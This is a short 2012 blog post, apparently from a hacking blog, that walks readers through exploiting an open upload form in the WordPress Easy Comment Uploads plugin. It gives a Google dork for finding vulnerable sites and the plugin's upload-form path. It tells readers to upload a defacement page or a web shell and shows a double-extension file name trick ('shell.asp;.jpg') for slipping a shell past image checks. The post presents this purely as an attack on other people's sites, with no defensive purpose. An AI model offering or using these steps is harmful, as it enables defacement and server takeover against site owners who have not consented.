Tuesday, 31 January 2012

Another Wordpress Exploit : 10,000+ Websites are Vunerable For this attack

wordpress-hacked.png (195×161)WordPress Easy Comment Upload Vunerablity

Google Dork 
Index of /wp-content/plugins/easy-comment-uploads

Open Google and enetr any dork which Given, 
Now selct any website 
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere

Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

Live Demo :- 

No comments:

Post a Comment